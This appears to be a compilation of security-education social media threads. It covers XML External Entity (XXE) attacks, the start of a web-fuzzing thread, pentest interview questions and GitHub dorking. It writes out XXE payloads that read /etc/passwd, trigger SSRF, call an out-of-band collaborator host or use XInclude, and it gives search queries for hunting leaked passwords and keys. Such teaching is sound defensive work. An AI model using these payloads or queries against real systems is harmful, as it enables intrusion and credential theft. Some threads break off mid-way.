What is XML, Entities and DTD?
How OWASP Top 10 2021 merged XXE in Security Misconfiguration?
XXE exploitation Types & Payloads for pentesters and bug bounty hunters
↓
→ XXE stands for XML External Entity
→ XXE is possible in applications which processes XML data in client side or server side
→ All Office documents process XML data. Eg -docx,xlsx,pptx
{2/18}
→ XXE attacks are possible when external entities are included and are processed.
→ OWASP Top 10 2017 introduced XXE at A-4 position.
→ OWASP Top 10 2021 merged in Security Misconfiguration at A-5
{3/18}
→ XML stands for extensible markup language
→ XML is like HTML but XML does not have predefined tags and and we can define our own tags.
→ XML language requires all tags to be closed unlike some HTML tags
{4/18}
→ XML Entities :
To represent some data in XML we will use entities and store data that is some address.
{5/18}
→ DTD ( Document Type Definition):
It has declarations that can define the structure of an XML document, the types of data values it can have
▶️ Internal DTD: DTD can be fully self-contained within the document itself
▶️ Eternal DTD: It can be loaded from elsewhere
XXE Impact:
→ Exfiltrate data from server like reading content of /etc/passwd or /etc/shadow
→ Escalate to SSRF
→ OOB XXE (External Blind XXE)
→ DOS ( XML Expansion)
→ Remote Code Execution
{8/18}
CVSS score of XXE is 7.5 and its severity is Medium with:
→ Improper Restriction of XML External Entity.
→ Local File SSRF
→ Remote File SSRF
→ Billion Laugh Attack
→ XXE via File Upload
{9/18}
XXE Exploitation:
→ Reading System files :
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
→ XXE to SSRF:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "test.com"> ]>
→ OOB XXE:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "collab.burpcollab.net"> ]>
{10/18}
Parametric Entities:
Sometimes application block uses of regular entities so we can use parametric entities.
→ <!ENTITY % xxe "a beautiful entity value" >
Final Payload :
→ <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "collab.burpcollab.net"> %xxe; ]>
{11/18}
XInclude attacks:
When you can't modify the DOCTYPE & If server process the user supplied data in SOAP request in back end as it uses XML and parses the XML entities.
→
<foo xmlns:xi="w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
{12/18}
Class XXE Base64 Encode:
→ Payload:
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
Mitigations for XXE :
→ Disable DTDs (External Entities) completelyfactory.setFeature("apache.org/xml/features/d…", true);
→External entities and external document type declarations must be disabled
→ Use CDATA for ignoring the external entities
{18/18}
• • •
Missing some Tweet in this thread? You can try to
force a refresh
Comprehensive Thread on Web App Fuzzing!
What is web fuzzing?
How can web fuzzing be super useful in Bug Bounties or Pentest?
FFUF for Web Fuzzing?
↓
{1/16}
Fuzzing is generally finding bugs/issues using automated scanning with supplying unexpected data into an application then monitoring it for exceptions/errors/stacktraces.
The motive is to supply superfluous data to trigger exceptions and see if it could lead to issue.
{2/16}
Fuzzing is since several years and has been done is different ways.
The term "fuzz" originated from a fall 1988 class project in the graduate Advanced Operating Systems class (CS736), taught by Prof. Barton Miller at the University of Wisconsin.
PS: These are the list of questions I have come across and questions faced by my students in their interviews.
Feel free to add more below 👇
1. What is your fav OWASP Top 10 bug 2. Explain your methodology? #infosec#bugbounty
3. CSRF vs SSRF 4. What can an attacker do with XSS 5. Requirements of CSRF to happen 6. Root cause of Clickjacking 7. What is diff between SAST & DAST 8. Black/White/Grey Box Testing 9. What is threat, vulnerability, risk 10. What is CIA Triad 11. What are cookie attributes
12. What are most common business logic issues? 13. Question on Burpsuite Tabs 14. What are your fav open source tools? 15. How will you protect against ransomware? 16. What is XXE attack, explain any payload? 17. SSRF and what can be achieved? 18. How can we fix SQLi #infosec
💡Manual:
GitHub Dorking is basically finding leaks in the code pushed by the target organisation or its employees.
1. org: evilcorp[.]com 2. language:"bash" org:evilcorp[.]com 3. "target[.]com" language:python "secret" "password" "key" NOT docs NOT sandbox NOT test NOT fake